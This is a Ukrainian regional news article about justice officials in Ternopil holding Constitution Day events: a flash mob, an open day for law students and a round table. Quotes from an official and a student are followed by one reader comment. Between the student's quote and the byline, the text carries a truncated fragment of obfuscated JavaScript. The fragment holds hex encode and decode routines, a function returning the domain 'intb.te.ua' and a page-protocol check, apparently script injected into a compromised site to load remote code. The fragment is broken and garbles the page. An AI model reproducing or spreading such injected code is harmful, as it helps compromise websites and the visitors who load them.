Ви знаходитесь: Головна / Новини / З нагоди Дня Конституції працівники юстиції провели низку заходів
З нагоди Дня Конституції працівники юстиції провели низку заходів

З нагоди Дня Конституції працівники юстиції провели низку заходів

Відзначати двадцяту річницю Конституції України розпочали і працівники юстиції. На Театральному майдані разом із учнями другої школи провели флеш-моб, під час якого роздавали тематичні буклети. Які ще заходи провели з нагоди свята, дивіться далі.

ЕДУАРД КОЛЬЦОВ,  начальник Головного територіального управління юстиції в області

«З нагоди Дня Конституції традиційно в нашому Головному територіальному управлінні юстиції в Тернопільській області проводиться тиждень правових знань. Саме сьогодні ми проводимо день відкритих дверей для студентів юридичного факультету ТНЕУ, щоб майбутні випускники, теперішні студенти, могли на свої очі побачити практичну роботу нашого управління. Щоб могли в майбутньому обрати для себе спеціальність чи спеціалізацію, за якою вони планують працювати».

Молодь мала можливість ознайомитися з основними напрямками роботи нотаріату, державної виконавчої служби, підрозділу з питань державної реєстрації, судової роботи та міжнародного співробітництва. Також, на юридичному факультеті ТНЕУ провели круглий стіл, де молоді науковці, студенти та практичні працівники поділилися думками з приводу вдосконалення та необхідності внесення змін до Основного Закону держави.

ВОЛОДИМИР, студент 4-го курсу  юридичного факультету ТНЕУ

«На таких заходах, круглих столах, конференціях, днях відкритих дверей, лекціях – розкривається кожний студент, молода людина, як можливий майбутній практик і справжній професіонал своєї справи».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

1 коментар

  1. Ольга Воля

    Ще хотілось щоб у День Конституції влада і юристи згадали про громадян України. Нам нав”язують те, що хоче влада, а про народ і Конституцію вже всі забули.

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top